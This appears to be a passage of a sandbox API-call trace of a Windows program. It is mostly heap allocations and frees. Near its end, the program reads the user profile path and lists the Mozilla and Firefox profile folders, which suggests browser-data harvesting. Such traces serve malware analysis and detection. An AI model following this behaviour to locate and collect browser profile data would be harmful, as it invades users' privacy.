hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.471] FreeLibrary (hLibModule=0x74d40000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0204.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0204.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.471] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.472] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0204.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.473] CloseHandle (hObject=0x2a0) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0204.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0204.474] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0204.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0204.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0204.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0204.478] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0204.478] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0204.478] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0204.479] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Mozilla", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla", lpFilePart=0x8bedfc*="Mozilla") returned 0x35 [0204.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0204.479] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla")) returned 0x2010 [0204.480] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd32, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa58e0 [0204.480] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd32, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0204.480] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd32, dwReserved1=0x4, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0204.480] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd32, dwReserved1=0x4, cFileName="Firefox", cAlternateFileName="")) returned 1 [0204.480] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd32, dwReserved1=0x4, cFileName="Firefox", cAlternateFileName="")) returned 0 [0204.480] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0204.480] GetLastError () returned 0x12 [0204.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0204.481] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0204.481] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0204.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0204.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0204.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0204.482] GetEnvironmentVariableW (in: lpName="USERPROFILE", 